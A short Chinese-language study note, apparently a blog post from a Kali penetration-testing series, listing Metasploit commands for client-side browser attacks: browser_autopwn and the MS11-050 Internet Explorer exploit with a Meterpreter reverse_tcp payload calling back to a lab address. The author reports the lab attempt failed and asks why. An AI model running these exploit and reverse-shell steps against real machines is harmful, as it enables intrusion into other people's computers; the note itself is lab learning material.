kali滲透測試與教學筆記9

客戶端滲透

use auxiliary/server/browser_autopwn

set lhost 10.10.10.128

set srvhost 10.10.10.128

set uripath auto

run

按書中,應該可能看到winxp靶機信息,建立meterpreter,地址是192.168.10.128

但是我的實驗看到的是網關ubuntu機器,10。10。10。254地址

不知道爲什麼?????

MS11-050漏洞攻擊過程:

use exploit/windows/browser/ms11_050_mshtml_cobjectelement

set payload windows/meterpreter/reverse_tcp

set URIPATH ms11050

set lhost 10.10.10.128

使用客戶靶機訪問http://10.10.10.128:8080/ms11050進行訪問,據說可以啓動meterpreter,但是我還是僅僅訪問到了網關

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章